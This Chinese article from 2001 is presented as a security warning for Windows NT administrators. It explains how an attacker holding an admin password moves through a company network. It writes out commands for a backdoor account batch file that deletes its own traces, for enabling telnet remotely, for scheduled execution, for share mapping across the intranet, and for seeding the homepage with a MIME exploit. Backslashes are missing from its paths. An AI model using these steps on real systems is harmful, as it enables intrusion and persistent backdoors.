客”得到NT的Admin以后能做什么 ( 2001/05/19) 现在的企业当中一般都是使用的NT系统,也不
得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安
全危机…… 当有人看了这个标题也许会说:“得到了NT的admin还能做什么,还不是想做什么就
做什么呗。”但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认
为密码为空没什么,因为他们压根就不知道“黑客”会怎么做。本文介绍的就是得到NT的Admin密
码以后入侵一个企业计算机群的初级和中级手法,尤其是在一个大型企业当中,企业系统管理员
的密码往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展
和生存。 首先,我们先假定得到了某个企业的一台服务器192.168.0.1的administrator的密码,
而对方没有关闭139端口。 一,普通共享资源的入侵 这种入侵手法可说是NT最简单的入侵了,随
便在自己机器的哪个窗口的地址栏里输入“192.168.0.1"大概等1-2秒,对方就会要求你输入用
户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共
享资源了,由于权限是admin所以你几乎可以删除对方共享资源里的任何东西。(如果设置了共享
为只读那就没办法了) 二,默认及隐藏共享资源的入侵 在说这种入侵方法之前我先来给大家介
绍一个NT的IPC$连接,在默认情况下NT系统有一个特殊的隐藏共享,就是IPC$共享。IPC$是专门
用在NT中的一种管道通讯,NT系统之间的通讯大部分都在IPC$通讯中完成的。 这次手法相对高明
一点,但还是很简单的,不过关键还是要看“黑客”如何利用了,有的人可能只能删删文件,有
的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用
后门进入。同样在机器里随便打开一个窗口,在地址栏输入"192.168.0.1"就会要求输入密码,
输入以后所看到的东西和前面介绍的一样,好现在同时也建立好IPC$连接了,其实在提示你输入
密码时从输入窗口中也知道了是建立IPC$连接。然后我们再次在地址栏输入地址,这次输入的就
有点不同了,输入“192.168.0.1c$”大概过一会就出现了对方C盘里所有的内容了。嘿嘿!想
看对方D盘?同样,输入“192.168.0.1D$”就看见对方D盘了。然后想换这个企业的主页(假
如对方还是一个WEB服务器)可说是轻而易举,记住由于权限是管理员当然可以写了,留不留后门
就看“黑客”的想法咯,一般他们会在C盘(假设在c:winnt下)建立一个批处理文件,假设文件
名为hack.bat,其内容一般为: net user hack 1234 /add * 建立一个用户名为hack的用户
密码为1234 * net localgroup administrators hack /add * 让hack也是管理员 * del
C:Documents and Settingsadministrator「开始」菜单程序启动hack.lnk *删除启动文件
夹里的快捷方式消除足迹 * del c:winnthack.bat * 删除hack.bat这个文件消除足迹
* 这样当企业系统管理员在下次登陆时就会偷偷的添加一个用户了。当然其实添加用户算是一个
比较愚蠢的留“后门”的方法了,所以其实很多“黑客”会放一个可以常驻内存的小程序,然后
建立一个类似的批处理文件和快捷方式,那么“黑客”基本上可以长期的占有企业中的这台主机
了。 三,IPC$连接入侵的高级手段 然而每个“黑客”都不可能那么笨,非要一直等到下次企业
系统管理员登陆以后才可以占有,往往“黑客”会使用更加巧妙的手法,迅速的留下后门。首先
他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开telnet服务,“黑
客”怎么打开telnet服务呢?其实有很多种方法,比如微软公司自己就出了一个小程序
(netsvc.exe)就是专门让系统管理员在建立IPC$连接以后远程打开服务用的管理工具,但这个
工具到了“黑客”手中自然也成了必不可少的“黑客”工具了,在命令符下输入"netsvc
192.168.0.1 telnet /start"大概等5分钟对方的telnet服务就打开了,然后"telnet
192.168.0.1"嘿嘿……等!需要NTLM验证,这下又把“黑客”拦在了外面了,这时他们又会用到
一个小程序了,就是专门关闭一个NTLM验证的程序ntlm.exe。(当然也可以是其他名字)“copy
ntlm.exe 192.168.0.1admin$system32”把ntlm.exe复制到对方企业服务器的system32目录
下。复制过去了,可怎么让他运行呢?当然多的是办法了。"net time 192.168.0.1"看看对方
系统时间为多少假设为18:00。现在再输入"at 192.168.0.1 18:02 ntlm.exe",等一会后,命
令提示符显示新加任务 ID=0,意思是对方系统在18:02时运行ntlm.exe这个程序,等到18:02以
后,然后再"telnet 192.168.0.1"嘿嘿~这回是提示需要输入用户和密码了,输入所得到的管理员
用户名和密码以后就成功的telnet到了企业服务器了……不过这样一下是netsvc一下又是at实在
是麻烦,现在就介绍另一个方法,首先还是先感谢微软为NT系统管理员提供的方便的管理功能,
这一功能到了“黑客”手中可说是“黑客”的福音,不用“黑客”再这么麻烦的输入这样那样的
命令了。建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接),打开本地计算
机里的“计算机管理”,用鼠标右键点计算机管理窗口里的“计算机管理(本地)”里面有“连
接到另一台计算机”选择它,在“名称”里输入“192.168.0.1”确定以后,首先你的NT系统会看
是否建立IPC$连接,“有”就连接上去了,现在你就可以直接管理192.168.0.1了,比如看他的日
志,启动他的服务(当然包括telnet了),管理他的IIS,什么都有。多研究一下,连注销对方系
统当前登陆的用户,重新启动对方计算机,关闭对方计算机都有,真是强大。NT系统到了“黑
客”手中,整个系统都成了一个“黑客”工具了,而且是功能非常强大的“黑客”工具。启动了
telnet了,可还是要NTLM验证怎么办?简单,在本地计算机建立一个用户名和密码相同的用户,
如果已有就把密码改为相同,然后使用这个用户在本地重新登陆,"telnet 192.168.0.1"嘿嘿~连
密码都不用输入了,因为通过NTLM验证了啊。 看了以上文章现在那些安全意识差的企业系统管理
员们知道了暴露了管理员密码的危险性了吧?还没完呢。都到这一步了还没完?机器都被“黑
客”完全控制了呀~是的,还没完,看吧! 四,入侵的深入 这一步就需要“黑客”有丰富的经
验,实战操作能力要求很高,也不再是文字能描述清楚的了,下面就只能粗略的介绍一下。 “黑
客”当然不会仅仅在攻馅一台服务器以后就立刻罢手了,他会深入入侵你的内网,尤其是在一个
企业中,往往都是计算机群,那些商业间谍“黑客”当然就更加的想入侵到企业内部去了,而很
多企业系统管理员喜欢把所有的服务器的密码设为相同,就给“黑客”提供了一个良好的入侵条
件,telnet到对方服务器以后,输入"net view"企业中整个一个工作组或域的计算机这时都一展
无余。同样在telnet里建立IPC$连接以后象入侵这台服务器一样的入侵了,前面说的建立IPC$连
接都是使用的图形界面,然而这时候已经不再拥有图形界面了,现在假设企业内网的192.168.0.2
的密码和这台服务器密码相同,这时可以使用"net use 192.168.0.2
IPC$ "passwd" /user:username"来建立IPC$连接了,然后是映射驱动盘,输入“net use z:
192.168.0.2c$”这样就把192.168.0.2的C盘映射到192.168.0.1的Z盘去了。输入"z:"就可以
象浏览192.168.0.1的硬盘一样,浏览192.168.0.2的C盘。而如果他是商业间谍“黑客”,一旦发
现里面有价值的东西自然不用说将来会发生什么事了。当然这往往还算是最好的条件,其实还是
有相当一部分企业系统管理员不会把密码设为一样的。现在就看网络的情况了,如果入侵的正好
是一台主域控制器,嘿嘿,那对于商业间谍来说可是高兴死了,赶快把自己升级成域管理员,这
下整个企业的一个域的机器都落在了他的手中。当然在“黑客”手中这也算是一种非常好的情
况,但现在微软行行色色的漏洞越来越多,同时也根据“黑客”的经验的多少,决定着入侵内网
的机会的大小。在一个企业中,往往直接连接Internet的是WEB服务器,而一个有耐性的“黑
客”,一个想入侵这个企业的商业间谍当然会不惜一切手段入侵,其中一个手法就是利用WEB服
务,微软公司在今年出现的MIME漏洞就有很好的利用价值,这里顺便介绍一下MIME漏洞,MIME在
处理不正常的MIME类型中存在问题,攻击者可以建立一个包含可执行文件的附件的HTML,EMAIL并
修改MIME头,使IE不正确处理这个MIME,而执行所指定的可执行文件附件。有关详细情况请大家
参阅badboy的《利用错误的MIME头实行攻击》在站点http://www.badclub.org/可以找到。有了这
个漏洞,“黑客”将会更换WEB服务器的主页,在主页里把MEMI漏洞攻击代码插进HTML中,使得企
业内部的员工在浏览自己公司主页时运行指定的程序。(企业内部绝对不可能从来不看自己的主
页的,尤其是企业负责人,他们一般都会不定期的检查主页。)那么他们在浏览自己的主页时就
无声无熄的执行了“黑客”所指定的程序,这个程序可能是木马,也可能同样是添加用户的批处
理文件。 由上面可以看出一旦NT系统的密码泄露是一件多么危险的事情,尤其在一个企业当中,
同时一个企业网络的拓扑是否合理也起着非常重要的作用,并且“黑客”尤其是商业间谍,所利
用的手法远远不只有这些,他们还可以利用其他方式,比如电子邮件等各种途径来得到企业内部
的敏感信息或保密信息。 五,其他入侵 这里所说的并不是说不重要,而是补充一下上面没有说
到的东西以及一些也是非常简单的手法。其他还可以通过3389端口入侵,3389是Win2000系统的自
带的,并且是图形界面的,远程管理里服务的端口,“黑客”一旦有了管理员密码,危险性也更
加直观化。另外就是通过IIS的管理入侵,在默认情况下IIS提供一个WEB方式的管理服务,在
c:inetpubwwwroot里有一个叫iisstar.asp的东西,如果可以访问,而且有管理员密码(NT4里
不是管理员也可以,只要是NT的合法帐号)就可以远程通过WEB方式管理IIS信息服务,然后通过
特殊手法进一步控制整个机器,然后是整个企业……